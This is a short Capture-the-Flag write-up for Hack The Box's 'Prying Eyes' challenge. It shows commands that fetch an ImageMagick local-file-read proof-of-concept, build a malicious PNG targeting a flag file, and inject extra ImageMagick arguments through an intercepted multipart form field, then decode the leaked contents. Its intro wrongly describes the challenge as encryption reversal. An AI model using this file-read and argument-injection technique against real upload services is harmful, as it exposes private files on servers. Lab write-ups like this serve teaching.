HackTheBox Prying Eyes Writeup
Explore the basics of cybersecurity in the Prying Eyes Challenge on Hack The Box. This medium-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
1
2
wget https://raw.githubusercontent.com/Sybil-Scan/imagemagick-lfi-poc/refs/heads/main/generate.py
python generate.py -f '/home/node/app/flag.txt' -o exploit.png
Register and login to create a new post with the file exploit.png. Then, using Burp Suite, intercept the request and replace the boundary 121759579010930786621073729912 with your custom boundary and add.
1
2
3
4
-----------------------------121759579010930786621073729912
Content-Disposition: form-data; name="blur"
1 -write uploads/hi.png ; echo
After the upload simply:
1
2
3
wget http://94.237.51.1:35160/uploads/hi.png
exiftool -b flag
echo "$(exiftool flag -b 2>/dev/null | grep -Eo '[0-9a-fA-F]{40,}')" | xxd -r -p
Summary
Prying Eyes is a medium-level challenge on Hack The Box that exploits an ImageMagick vulnerability to read sensitive files. By crafting a malicious image (exploit.png) using a provided script, the file is uploaded via the web application. The process involves intercepting and modifying the HTTP request in Burp Suite to inject custom commands using ImageMagick’s -write feature.
After uploading the file, the generated output (hi.png) is downloaded and analyzed with exiftool to extract the hidden flag. This challenge highlights the dangers of improper file handling and command injection vulnerabilities in applications utilizing external libraries.